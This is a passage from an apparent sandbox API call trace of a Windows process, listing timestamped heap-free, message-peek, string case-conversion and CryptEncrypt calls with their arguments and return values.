(in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0189.810] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.810] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.810] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.811] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.811] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0189.811] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0189.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0189.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.812] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0189.812] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.812] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0189.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.812] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.812] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0189.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.813] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0189.813] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.813] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0189.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.814] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.814] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.814] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0189.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.814] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0189.814] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.814] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.814] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.814] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.815] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0189.815] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0189.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0189.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0189.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0189.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24db6c0 | out: hHeap=0x25c0000) returned 1 [0189.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0189.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.820] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0189.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.821] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x3c59, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x3c60) returned 1 [0189.821] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.821] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.821] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.821] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.821] CharLowerBuffW (in: lpsz="byte[15456]", cchLength=0xb | out: lpsz="byte[15456]") returned 0xb [0189.822] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.822] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.822] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.822] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.822] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.822] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.822] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.822] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.822] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24db6c0*, pdwDataLen=0x8bef68*=0x3c59, dwBufLen=0x3c60 | out: pbData=0x24db6c0*, pdwDataLen=0x8bef68*=0x3c60) returned 1 [0189.823] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.823] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.823] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.823] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.823] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.823] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.823] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.823] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0189.823] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.823] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0189.823] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.823] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.823] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0189.823] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.824] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0189.824] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.824] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.824] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.824] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.824] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.824] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.824] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.824] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.824] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, 